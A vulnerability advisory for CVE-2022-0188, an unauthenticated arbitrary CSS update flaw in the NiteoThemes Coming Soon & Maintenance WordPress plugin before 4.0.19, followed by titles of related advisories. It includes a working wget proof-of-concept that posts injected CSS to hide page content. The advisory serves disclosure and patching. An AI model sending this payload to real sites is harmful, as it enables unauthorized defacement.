Coming Soon & Maintenance Plugin by NiteoThemes < 4.0.19 – Unauthenticated Arbitrary CSS Update | CVE 2022-0188 | Plugin Vulnerabilities

Description

The plugin allows any user, even not logged in, to arbitrarily change the coming soon page layout.

Proof of Concept

wget 127.0.0.1:8001 --post-data="niteoCS_footer_background_opacity_hardwork=0%29;%7dbody%7Bbackground-image%3Aurl%28data%3A//image/gif%3Bbase64%2CR0lGODdhKAAoAIABAAAAAP///ywAAAAAKAAoAAACX4yPqcvtD6OctNqLs968GwB4DkheJUSeUxqObCu98CJTtZvaL6quucjoAYfEovGI9M2MrJjwccM9G9FglXpVyJa0LW9n9X635Gy4jOZK02YoW1x5NzNytYWdzOv3/GIBADs%3D%29%3B%7Ddiv,section%7Bdisplay%3Anone%20%21important%7D%3B" -q -O-

Affects Plugins

cmp-coming-soon-maintenance

Fixed in 4.0.19

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2657597/cmp-coming-soon-maintenance

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

50b6f770-6f53-41ef-b2f3-2a58e9afd332

Timeline

Publicly Published

2022-01-17 (about 3 years ago)

Added

2022-01-17 (about 3 years ago)

Last Updated

2022-04-10 (about 3 years ago)

Other

Published

Title

Published

2025-10-08

Title

Search & Go < 2.8 - Authentication Bypass to Privilege Escalation

Published

2014-08-01

Title

Delightful Downloads 1.3.1.1 - meta-boxes.php dedo_meta_boxes_save Function Multiple Action Authorization Bypass

Published

2018-03-03

Title

Super Socializer < 7.11 - Authentication Bypass

Published

2021-08-24

Title

Booster for WooCommerce < 5.4.4 - Authentication Bypass

Published

2019-05-28

Title

Slick Popup <= 1.7.1 - Privilege Escalation